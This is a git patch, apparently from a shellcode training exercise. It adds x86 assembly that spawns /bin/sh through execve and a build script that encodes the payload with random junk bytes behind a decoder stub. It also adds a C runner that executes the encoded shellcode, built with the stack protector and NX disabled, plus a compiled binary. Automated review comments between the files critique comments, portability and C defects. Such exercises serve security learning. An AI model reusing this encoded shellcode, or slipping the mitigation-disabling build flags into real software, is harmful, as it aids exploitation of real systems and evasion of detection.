From 2e6842607995aad0a0379232ea78ee14ca3fb430 Mon Sep 17 00:00:00 2001
From: arno01
Date: Thu, 11 Apr 2013 13:49:58 +0200
Subject: [PATCH] minor updates

---
 exam4/execve-stack.nasm | 70 ++++++++++++++++++++++++++++++++++++++++
 exam4/make.sh | 66 +++++++++++++++++++++++++++++++++++++
 exam4/shellcode | Bin 0 -> 4980 bytes
 exam4/shellcode.c | 11 +++++++
 4 files changed, 147 insertions(+)
 create mode 100644 exam4/execve-stack.nasm
 create mode 100755 exam4/make.sh
 create mode 100755 exam4/shellcode
 create mode 100644 exam4/shellcode.c

diff --git a/exam4/execve-stack.nasm b/exam4/execve-stack.nasm
new file mode 100644
index 0000000..77df821
--- /dev/null
+++ b/exam4/execve-stack.nasm
@@ -0,0 +1,70 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+ ;
+ ; =============================== EXECVE =====================================
+ ;
+ ; Now as we forwarded sockfd to a client, we can spawn shell.
+ ; Prepare the path, in little-endian, using the Python
+ ; >>> '//bin/sh'[::-1].encode('hex')
+ ; '68732f6e69622f2f'
+ ;
+ ; int execve(const char *filename, char *const argv[], char *const envp[]);
+ ; EAX EBX, ECX, EDX
+ ; 11 '//bin/sh' PTR to EBX NULL
+ ;
+ ;
+
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
+
+ ; === EXIT(0) ===
+ ; void _exit(int status);
+ ; /usr/include/asm/unistd_32.h:#define __NR_exit 1
+ xor eax, eax ; EAX = 0x000000
+ mov al, 1 ; EAX = 0x000001 1: exit syscall
+ xor ebx, ebx ; EBX = 0x000000 0: success status
+ int 0x80
+
+
+;section .data
diff --git a/exam4/make.sh b/exam4/make.sh
new file mode 100755
index 0000000..66d2e3a
--- /dev/null
+++ b/exam4/make.sh
@@ -0,0 +1,66 @@
+#!/usr/bin/env sh
+#
+# This script will generate shellcode.c and compile it
+#
+
+#
+# Compile the payload and decoder
+#
+echo " [+] Compiling the payload and decoder ..."
+SPAYLOAD=./execve-stack
+nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o
+SDECODER=./decoder
+nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o
+
+echo " [+] Preparing decoder shellcode ..."
+DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done)
+
+#
+# Encode the payload shellcode
+#
+echo " [+] Encoding the payload shellcode ..."
+#
+# $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
+# 00000000 37 aaa
+# 00000001 FA cli
+# 00000002 D6 salc
+# 00000003 3F aas
+#
+
+garbage=('\x37' '\xFA' '\xD6' '\x3F');
+ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[RANDOM%4]]}; done; echo -n "\xAF\"")
+
+FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}
+
+#
+# Generate shellcode.c
+#
+echo " [+] Generating shellcode.c file ..."
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char code[] = \
+$FULL_SHELLCODE;
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+EOF
+
+#
+# Compile C code with GCC
+#
+echo " [+] Compiling shellcode.c with GCC ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+ls -la ./shellcode
+
+#
+# Cleanup
+#
+rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o
+
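Review bot: The comment `; Now as we forwarded sockfd to a client, we can spawn shell.` describes a socket hand-off that nothing in this file performs — the only system calls issued are execve (eax=11) and exit (eax=1) — so it reads as left over from a sibling exercise and should be dropped or replaced by a line describing this file, e.g. `; Build NUL-terminated "//bin/sh", argv and envp on the stack, then execve`. The `xor edx, edx` sitting under the `; EBX` heading is really preparing the zero reused by every later `push edx`, so it deserves its own comment (`; edx = 0, reused for each NULL below`) rather than being read as part of the EBX setup. The `=== EXIT(0) ===` block after the first `int 0x80` only executes if execve returns, i.e. fails; a comment `; reached only if execve fails` would make that explicit for readers tracing the control flow.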
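Review bot: The shebang is `#!/usr/bin/env sh`, but the script relies on bash-only syntax — the `garbage=(...)` array and `${garbage[$[RANDOM%4]]}` — which is a syntax error under dash (the `sh` on Debian-family systems), and `echo -n` with `\x` escapes is also not portable across shells. Change the first line to `#!/usr/bin/env bash`, and prefer `printf '\\x%s' "$i"` over `echo -n '\x'$i` in both loops. The heredoc template has two C defects that appear verbatim in the committed exam4/shellcode.c as well: `main()` with an implicit int return is not valid C99, and `printf("%d", strlen(code))` passes a size_t to `%d`; `int main(void)` and `printf("Shellcode Length: %zu\n", sizeof code - 1)` fix both, and sizeof also reports the full array length instead of stopping at any NUL byte. The `gcc -m32 -fno-stack-protector -z execstack` line deliberately turns off two compiler/loader mitigations for this exercise; a comment such as `# exercise build only: disables stack protector and NX` would keep those flags from being copied into other builds.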
diff --git a/exam4/shellcode b/exam4/shellcode new file mode 100755 index 0000000000000000000000000000000000000000..23fc6816381de91afce07048b1648f941d17453e GIT binary patch literal 4980 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 literal 0 HcmV?d00001 diff --git a/exam4/shellcode.c b/exam4/shellcode.c new file mode 100644 index 0000000..51293f1 --- /dev/null +++ b/exam4/shellcode.c @@ -0,0 +1,11 @@ +#include +#include + +unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\x37\xc0\x3F\xb0\x37\x0b\xD6\x31\xFA\xd2\x3F\x52\x3F\x68\x3F\x6e\xFA\x2f\xFA\x73\xFA\x68\xFA\x68\xFA\x2f\x37\x2f\xFA\x62\xFA\x69\x37\x89\xD6\xe3\xFA\x52\xD6\x53\xD6\x89\x3F\xe1\xD6\x52\xD6\x89\x37\xe2\xFA\xcd\x37\x80\xD6\x31\xFA\xc0\x37\xb0\x37\x01\x37\x31\x3F\xdb\xD6\xcd\x3F\x80\xFA\xAF"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +}
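Review bot: This file is the output of make.sh's `cat > shellcode.c << EOF` step, and because that script chooses its filler bytes with `$RANDOM`, the committed copy cannot be regenerated from source and will differ on every run; the same applies to the compiled `exam4/shellcode` binary added in this commit. Either keep only the generator and the .nasm sources in the repository, or add a header comment `/* generated by exam4/make.sh -- do not edit by hand */` so a reader knows which copy is authoritative. The two `#include` lines show no header name on this page, which is presumably a rendering artifact since the binary was built; if the file really contains bare `#include` lines it will not compile and they should read `#include <stdio.h>` and `#include <string.h>`.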